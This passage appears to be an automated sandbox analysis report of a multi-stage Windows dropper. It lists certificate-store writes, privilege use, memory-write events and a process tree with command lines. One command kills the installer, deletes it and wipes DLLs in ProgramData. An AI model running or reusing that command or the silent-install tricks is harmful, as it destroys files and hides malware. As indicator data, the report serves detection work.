728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 gaooo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Paekygibina.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a gaooo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Paekygibina.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Paekygibina.exe -
Script User-Agent 15 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 46 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 49 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 45 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 47 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 55 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 36 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs
pid Process 3712 gaooo.exe 6156 md7_7dfj.exe 8088 askinstall29.exe 5532 customer4.exe 6388 privacytools5.exe 7360 setup.exe 7624 setup.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 524 Setup.tmp 524 Setup.tmp 440 Setup.exe 440 Setup.exe 440 Setup.exe 440 Setup.exe 1612 prolab.tmp 1612 prolab.tmp 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe 976 Paekygibina.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1192 Process not Found 8004 WerFault.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 6560 setup.exe 472 Process not Found -
Suspicious behavior: MapViewOfSection 22 IoCs
pid Process 6904 privacytools5.exe 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 5632 scdvrab 3916 scdvrab 4396 scdvrab -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeRestorePrivilege 440 Setup.exe Token: SeBackupPrivilege 440 Setup.exe Token: SeDebugPrivilege 2188 taskkill.exe Token: SeDebugPrivilege 976 Paekygibina.exe Token: SeDebugPrivilege 4680 taskkill.exe Token: SeDebugPrivilege 7408 powershell.exe Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeRestorePrivilege 8856 7za.exe Token: 35 8856 7za.exe Token: SeSecurityPrivilege 8856 7za.exe Token: SeSecurityPrivilege 8856 7za.exe Token: SeSystemEnvironmentPrivilege 6560 setup.exe Token: SeDebugPrivilege 6560 setup.exe Token: SeLoadDriverPrivilege 6560 setup.exe Token: SeDebugPrivilege 8752 powershell.EXE Token: SeRestorePrivilege 7816 7za.exe Token: 35 7816 7za.exe Token: SeSecurityPrivilege 7816 7za.exe Token: SeSecurityPrivilege 7816 7za.exe Token: SeDebugPrivilege 8200 setup.exe Token: SeImpersonatePrivilege 8200 setup.exe Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeSystemEnvironmentPrivilege 3028 csrss.exe Token: SeSecurityPrivilege 7388 sc.exe Token: SeSecurityPrivilege 7388 sc.exe Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeDebugPrivilege 3548 powershell.EXE Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeDebugPrivilege 8004 WerFault.exe Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found Token: SeShutdownPrivilege 1192 Process not Found -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 1312 Setup3310.tmp 524 Setup.tmp 1692 Delta.tmp 1136 PictureLAb.tmp 1612 prolab.tmp 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found 1192 Process not Found -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3392 784B.tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1640 wrote to memory of 1312 1640 Setup3310.exe 26 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 1312 wrote to memory of 564 1312 Setup3310.tmp 30 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 564 wrote to memory of 524 564 Setup.exe 31 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 524 wrote to memory of 1448 524 Setup.tmp 32 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1448 wrote to memory of 1692 1448 Delta.exe 33 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 1692 wrote to memory of 440 1692 Delta.tmp 34 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 524 wrote to memory of 996 524 Setup.tmp 35 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 996 wrote to memory of 1136 996 PictureLAb.exe 36 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 1136 wrote to memory of 880 1136 PictureLAb.tmp 37 PID 880 wrote to memory of 620 880 Setup.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp" /SL5="$2015A,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp" /SL5="$201A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp" /SL5="$10202,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit8⤵PID:2124
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:2380
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp" /SL5="$20202,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp" /SL5="$40164,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:620 -
C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe" /S /UID=lab2149⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
PID:1248 -
C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe"C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp" /SL5="$50160,575243,216576,C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe"C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe"10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976 -
